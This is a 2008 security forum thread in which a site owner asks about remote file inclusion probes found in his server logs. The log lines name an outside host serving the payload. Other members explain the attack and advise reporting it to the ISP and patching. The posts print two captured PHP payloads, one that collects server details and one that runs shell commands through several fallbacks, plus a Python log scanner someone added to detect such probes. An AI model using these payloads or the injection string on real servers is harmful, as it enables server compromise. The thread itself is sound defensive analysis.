-
January 3rd, 2008, 05:31 AM
#1
Who's attacking the Wolfman?
The Wolfman was reviewing my server logs today when I came across this:
Code:
//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 404 Date: Jan 02 18:41:25 Http Version: HTTP/1.1 Size in Bytes: -
Referer: - Agent: libwww-perl/5.808
67.15.175.50
/gbook//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 200 Date: Jan 02 18:44:32 Http Version: HTTP/1.1 Size in Bytes: 4290
Referer: - Agent: libwww-perl/5.808
67.15.175.50
It looks like someone has written a perl script that is testing my directories for the presence of an admin.php that is vulnerable to a parameter injection attack.
The second attempt actually found my gbook directory which is used by my Ghoulbook. I'm guessing the script spidered my site for admin.php. For all admin.php files discovered, it attempted the injection.
Here is the content of Goid.txt
Code:
<?
echo "IndoServ<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "IndoServ IRC NetWork<br>";
exit;
?>
It looks like Goid.txt is trying to display information about my server and my user account.
http://thermair.co.uk/ is an Air treatment company in the UK. They are probably unaware that their site is being used to harbour internet attacks against web servers.
A search of the source IP address 67.15.175.50 shows that others have also been attacked.
So here are my questions:
1) Has anyone seen this before?
2) Do you think the Wolfman should notify the Air Treatment company?
Thanks
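An added example (my own, not the Wolfman's or anything from the forum) that parses the four-line record layout the post shows and flags requests whose parameter value is itself a remote URL, which is the signature of a remote file inclusion probe. The sample records are constructed from the post's two entries plus one benign request; the only assumption is the four-line layout.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in the four-line layout the post shows (request, status,
# referer/agent, client IP); the first two records mirror the post, the third is benign.
SAMPLE_LOG = """\
//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 404 Date: Jan 02 18:41:25 Http Version: HTTP/1.1 Size in Bytes: -
Referer: - Agent: libwww-perl/5.808
67.15.175.50
/gbook//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 200 Date: Jan 02 18:44:32 Http Version: HTTP/1.1 Size in Bytes: 4290
Referer: - Agent: libwww-perl/5.808
67.15.175.50
/index.php?page=about
Http Code: 200 Date: Jan 02 19:02:11 Http Version: HTTP/1.1 Size in Bytes: 8120
Referer: - Agent: Mozilla/5.0
192.0.2.10
"""

REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
SCANNER_AGENTS = ("libwww-perl",)  # scripted-client agent seen in the post; extend from your own logs
STATUS_RE = re.compile(r"Http Code: (\d{3}) Date: (.+?) Http Version")
AGENT_RE = re.compile(r"Agent: (.*)$")

def parse_records(text):
    """Group non-empty lines four at a time into dicts."""
    lines = [l for l in text.splitlines() if l.strip()]
    records = []
    for i in range(0, len(lines) - 3, 4):
        req, status, agent, ip = lines[i:i + 4]
        m, a = STATUS_RE.search(status), AGENT_RE.search(agent)
        records.append({"request": req.strip(), "status": int(m.group(1)) if m else None,
                        "date": m.group(2) if m else None,
                        "agent": a.group(1).strip() if a else "", "ip": ip.strip()})
    return records

def rfi_findings(records):
    """Flag any query parameter whose value is itself a remote URL."""
    findings = []
    for r in records:
        path, _, query = r["request"].partition("?")  # not urlsplit: '//admin.php' would parse as a host
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                findings.append({"ip": r["ip"], "path": path, "param": name, "remote": value,
                                 "status": r["status"],  # 200 proves the script exists, not that the include ran
                                 "scripted_agent": r["agent"].startswith(SCANNER_AGENTS)})
    return findings

if __name__ == "__main__":
    for f in rfi_findings(parse_records(SAMPLE_LOG)):
        print(f"{f['ip']} -> {f['path']} param={f['param']} remote={f['remote']} status={f['status']}")
```

A 200 on a flagged request only tells you the target script exists; whether the remote file was actually fetched and executed has to be checked on the host (PHP's allow_url_include/allow_url_fopen settings and the script's own include logic).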
-
January 3rd, 2008, 05:48 AM
#2
Here is another script being run against my server. I guess this is more popular than I first thought.
Code:
<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
-
January 3rd, 2008, 06:16 AM
#3
Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.
It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent, "libwww-perl/5.808". As always, stay current on your updates and check your logs.
Quitmzilla is a Firefox extension that gives you stats on how long you have quit smoking, how much money you've saved, how much you haven't smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.
-
January 3rd, 2008, 07:16 AM
#4
There's a handful of things it could be. But whatever the person is using, the intent is the same. By the looks of it, the person/bot is just doing recon. The next step is attack. You should definitely whois the air company and inform the admin and keep an eye on your logs. I'd ban the IP from my server.
Also, online ip tracers are a very handy tool. If you enter that IP into one like http://visualiptrace.visualware.com, you'll see it traces back to Houston TX, and the ISP's number is 214-782-7802, and abuse contact is abuse@theplanet.com.
Save your logs. Paired with the google results, your next step should be to contact the ISP's abuse dept and have that problem handled right there. Make it clear you have evidence (logs+results) that this person is intentionally scanning for vulnerabilities and actively trying to exploit them, otherwise they may just brush you off as another paranoid user.
-
January 3rd, 2008, 09:07 AM
#5
When and if you do send an email to the abuse address, don't put your analysis in there. Just the plain facts (relevant sections of your logs) as clear text in the body (no attachments). And don't use HTML email.
If you don't do it properly your abuse complaint may end up in the bitbucket.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
January 3rd, 2008, 02:42 PM
#6
Originally Posted by phishphreek
Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.
It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent, "libwww-perl/5.808". As always, stay current on your updates and check your logs.
I will 2nd this.
also do a whois on the IP as it is most likely a proxy.
-
January 3rd, 2008, 08:23 PM
#7
I just ignore stuff like that. The only time you have to worry about it is if you're running the web application they're trying to exploit. I have fun collecting their remote include scripts though.
-
January 3rd, 2008, 09:46 PM
#8
^^ When it comes to your server's security, ignorance is not bliss.
-
January 4th, 2008, 05:04 AM
#9
Thanks everyone for the great advice. I've contacted the abuse team at theplanet.com, where the attack is coming from. Hopefully I will receive a response soon.